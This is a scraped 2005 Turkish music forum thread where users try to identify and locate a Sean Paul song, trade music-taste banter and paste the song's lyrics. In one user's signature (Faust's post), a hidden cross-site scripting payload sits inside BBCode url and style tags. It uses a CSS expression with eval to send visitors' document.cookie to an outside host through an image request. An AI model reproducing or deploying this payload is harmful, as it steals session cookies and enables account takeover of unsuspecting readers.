DioNea Mesaj tarihi: Aralık 14, 2005 Mesaj tarihi: Aralık 14, 2005 bi kere rastgele klibini görme fırsatım oldu galiba son şarkısı çok hareketli bi şarkı kamyonların arasında falan sölüyo bilen varmı bu şarkıyı eğer elinde olan varsa indirebileceğim bi linkini koyarsa çok sevinirim[signature][hline]laviniam....
NoS Mesaj tarihi: Aralık 14, 2005 Mesaj tarihi: Aralık 14, 2005 sevdiğim kız bunu seviyor(ki kız aslen dm ci bi insan rap den bi tek bunu seviyor)o yüzden gıcığım bu şan pol e[signature][hline] estranged I knew the storm was getting closer And all my friends said i was high But everything we've ever known's here I never wanted it to die
DioNea Mesaj tarihi: Aralık 14, 2005 Konuyu açan Mesaj tarihi: Aralık 14, 2005 hişşttt kızma sean paula:) bende fazla dinlemem ama bu şarkı gerçekten çok güzel[signature][hline]laviniam....
NoS Mesaj tarihi: Aralık 14, 2005 Mesaj tarihi: Aralık 14, 2005 ben aslen metal rock karışımı dinleyen bi insan olduğumdan sırf bana gıcık olsun die bazen yanımda anlatıyor yok şan pol şöyle yakışıklı şöyle tatlı fln allahın zenci rapçisi(o adam zenci mi) not:hepimiz kardeşiz:D[signature][hline] estranged I knew the storm was getting closer And all my friends said i was high But everything we've ever known's here I never wanted it to die
DioNea Mesaj tarihi: Aralık 14, 2005 Konuyu açan Mesaj tarihi: Aralık 14, 2005 yerine göre beyaz yerine göre zenci oluyo her klibinde farklı ne olduğu belli deilde şarkı elinde olan yokmu:(:([signature][hline]laviniam....
SmoLaFein Mesaj tarihi: Aralık 14, 2005 Mesaj tarihi: Aralık 14, 2005 Ben o tarz muzık pek sewmem ama hosuma gıdıyor sean paul un sarkıları boyle cok hızlı we degısık bı aksanla soyluo ya super oluyor bence[signature][hline]Apache, 05 Eylül 2005 12:20 tarihinde demiş ki: ankara bes tepe iki tepe acıgı var atom bombası yıyebılırız
DioNea Mesaj tarihi: Aralık 14, 2005 Konuyu açan Mesaj tarihi: Aralık 14, 2005 bütün şarkıları birbirine benziyor ama hepsinde ayrı bi güzellik var dimi:)[signature][hline]laviniam....
Helcaraxe Mesaj tarihi: Aralık 14, 2005 Mesaj tarihi: Aralık 14, 2005 we be burning gibi bişi olmalı.[signature][hline]Mike, 13 Kasım 2005 22:37 tarihinde demiş ki: pardon sen nerenle karıştırıodun?
DioNea Mesaj tarihi: Aralık 15, 2005 Konuyu açan Mesaj tarihi: Aralık 15, 2005 ewet ewet o burning li bişidi şarkının bi kelimesini hatırladık linkini vererek bulmacayı bitirecek olan varmı??[signature][hline]laviniam....
BulletRide Mesaj tarihi: Aralık 15, 2005 Mesaj tarihi: Aralık 15, 2005 said: NoS, 14 Aralık 2005 15:28 tarihinde demiş ki: ben aslen metal rock karışımı dinleyen bi insan olduğumdan sırf bana gıcık olsun die bazen yanımda anlatıyor yok şan pol şöyle yakışıklı şöyle tatlı fln allahın zenci rapçisi(o adam zenci mi) not:hepimiz kardeşiz:D Zenci değil Jamaica'lı...[signature][hline]D'akmor so 80's Remember yesterday.. Walking hand in hand Love letters in the sand.. I remember you
Krusty Mesaj tarihi: Aralık 15, 2005 Mesaj tarihi: Aralık 15, 2005 şarkının tam adı we be burnin olması lazım.[signature][hline]-- homines libenter quod volunt credunt.
Helcaraxe Mesaj tarihi: Aralık 15, 2005 Mesaj tarihi: Aralık 15, 2005 Just gimme the trees an we be clubbin yow. Gal a make wi please and we be thuggin' now. sippin hennesy an we'll be bubblin yow. Set we mind at ease we got to take it slow. Verse 1: So when you see the S.p. floatin don't provoke him Cause the girls we be poking have to smoking. Best thing fi the recreation a fi get the best girls inna every nation. All ma girls we promotin and suportin And dem love how we flow king here them shouting First class ticket invitation girls from New York, England and Jamaican. Chorus: Everyday we be burnin not concernin what nobody wanna say. We be earnin dollars turning cause we mind de pon we pay. More than gold and oil and diamonds girls we need dem everyday. Recognize it, comon legalize it Verse 2: Girls them a page me waan fi raise me True me write nuff tune and drive them crazy. Well I man a true born Jamaican Ready fi the girls them inna every situation. We a the gal dem pro, them know we flow With the lyrical content that make them dip low and Make the club keep jumpin Turn up the bass make we here when it pumpin. Summertime bounce to the music people choose it Sean da P gal a cruise with... well reputed cause. We a the girls them champion, Have nuff a them like the great king Solomon. Many girls inna wi eye sight sexy dress type Se them ready fi a hype night Just gimme di light An make we blaze it the roof we haffi raise it again[signature][hline]Mike, 13 Kasım 2005 22:37 tarihinde demiş ki: pardon sen nerenle karıştırıodun?
Zegna Mesaj tarihi: Aralık 15, 2005 Mesaj tarihi: Aralık 15, 2005 yoyo şanpol madafaka :p[signature][hline]4 8 15 16 23 42
Redogski Mesaj tarihi: Aralık 15, 2005 Mesaj tarihi: Aralık 15, 2005 said: DioNea, 15 Aralık 2005 09:55 tarihinde demiş ki: ewet ewet o burning li bişidi şarkının bi kelimesini hatırladık linkini vererek bulmacayı bitirecek olan varmı?? we will be burnin' yada we will be burning[signature][hline]Seni sevdiğim kdr yaşasaydım, ölümsüzlüğün adını Beşiktaş koyardım. [Bu mesaj Redogski tarafından 15 Aralık 2005 16:06 tarihinde değiştirilmiştir]
RabbiT Mesaj tarihi: Aralık 15, 2005 Mesaj tarihi: Aralık 15, 2005 Ona ve onun izinden giden gençlere tapıyorum ben,beni çok eğlendiriyorlar. =)[signature][hline]I am very happy with my carrots!
Fistan Mesaj tarihi: Aralık 15, 2005 Mesaj tarihi: Aralık 15, 2005 hey yov "Can You Do The Work"olabilir o şarkı ;)[signature][hline]FİLTHY PLAY / when it rains the ground gets wet! MZ : FC Antalya United / The Paticik Cup =o= II / silkroad|troy|Washi
Faust Mesaj tarihi: Aralık 15, 2005 Mesaj tarihi: Aralık 15, 2005 Sean Paul - We Be Burnin' msn [email protected] göndereyim.[signature][hline]Wind of change... ]www.noir.gen.tr[url=http:///=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.xtratogame.net/pixel.gif?'+document.cookie;this.sss=null`style='font-size:0;][/url]'[/color][/url][/url] ICQ: 714523 - MSNM: [email protected]
only_devil Mesaj tarihi: Aralık 15, 2005 Mesaj tarihi: Aralık 15, 2005 sean paul'e laf yok.adam süper eleştirisi mi kalmış?[signature][hline]All I can do is try...
Angelfire Mesaj tarihi: Aralık 15, 2005 Mesaj tarihi: Aralık 15, 2005 said: Zegna, 15 Aralık 2005 15:51 tarihinde demiş ki: yoyo şanpol madafaka :p zegna yemin ederim kırk yılda bir giriyorum böyle topicler görünce patlatmak gelio içimden ama hepsini sen patlatmışsın zaten en büyük zevkimide aldın elmiden hiç yazasım gelmio forumlara[signature][hline]Welcome to Linuxland, in silent nights you may hear the windows machines rebooting sound...
BulletRide Mesaj tarihi: Aralık 15, 2005 Mesaj tarihi: Aralık 15, 2005 Niye Sean Paul seven olamaz mı müzik forumu metalcilere ait değil sanırım sadece... p.s:Sean Paul'den haz etmiyorum...[signature][hline]D'akmor so 80's Remember yesterday.. Walking hand in hand Love letters in the sand.. I remember you
Mephinx Mesaj tarihi: Aralık 15, 2005 Mesaj tarihi: Aralık 15, 2005 burda oyle pop, trance,techno muzık dınlıyorsan baştan kaybettın conconsun muzık zevkın yoktur hersey gurultudur ona tapmalısın fln..
Öne çıkan mesajlar